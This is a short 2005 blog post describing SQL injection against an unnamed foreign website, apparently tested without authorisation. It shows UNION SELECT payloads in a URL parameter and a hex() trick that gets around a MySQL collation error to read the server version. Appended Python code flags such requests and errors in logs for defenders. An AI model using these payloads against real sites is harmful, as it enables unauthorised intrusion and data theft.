Author: SuperHei
Article type: Original
Published: 2005-10-18
While testing a foreign site:
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
The following error was returned:
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
MySQL Error No. 126
It appears the error occurs because the two sides of the UNION query use different character sets (http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html).
Solution: convert the value to another encoding, such as hex.
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
This successfully returned the value of hex(version()):
342E312E332D62657461
Querying it back in MySQL gives:
mysql> select 0x342E312E332D62657461;
+------------------------+
| 0x342E312E332D62657461 |
+------------------------+
| 4.1.3-beta             |
+------------------------+
1 row in set (0.00 sec)
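The defender's view of the exchange above, as an added example that is not part of the original post: the collation error on 'UNION' and the follow-up request with hex() around a function both leave traces that log triage can flag. Function names and the sample inputs are assumptions constructed from the requests and error text quoted in the post.

```python
import re
from urllib.parse import unquote

# Request shape quoted in the post: UNION SELECT, optionally with hex() around a function.
UNION_RE = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
HEX_WRAP_RE = re.compile(r"\bhex\s*\(\s*[a-z_@]+", re.I)
# Error text quoted in the post. An application whose own queries never use UNION
# has no legitimate reason to log it.
COLLATION_RE = re.compile(r"Illegal mix of collations .* for operation 'UNION'", re.I)


def normalize(query_string):
    """Decode twice (catches double URL-encoding), drop closed /* */ comments, squeeze spaces."""
    s = unquote(unquote(query_string.replace("+", " ")))
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s)


def classify_request(query_string):
    """Return findings for one raw query string from an access log."""
    s = normalize(query_string)
    findings = []
    if UNION_RE.search(s):
        findings.append("union-select")
        if HEX_WRAP_RE.search(s):
            findings.append("hex-wrapped-output")
    return findings


def classify_error(line):
    """Return findings for one line of the application or database error log."""
    return ["union-collation-error"] if COLLATION_RE.search(line) else []


# Constructed sample input, built from the requests and error quoted in the post.
SAMPLE_QUERIES = [
    "c_id=2",
    "c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*",
    "c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*",
]
SAMPLE_ERROR = ("Illegal mix of collations (euckr_korean_ci,IMPLICIT) and "
                "(utf8_general_ci,IMPLICIT) for operation 'UNION'")

if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(classify_request(q), q)
    print(classify_error(SAMPLE_ERROR))
```

Matching on the request alone is only triage; binding c_id as an integer parameter in the query is what removes the injection point.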